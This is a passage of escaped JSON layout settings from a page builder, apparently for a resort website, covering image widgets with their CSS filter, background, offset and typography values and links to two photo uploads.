unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f0e6f3c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94d196a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6775c1a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c1eb986\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"95541c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3611.jpg\",\"id\":170},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7395e62\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/Fishing09-001.jpg\",\"id\":24},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5059136\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"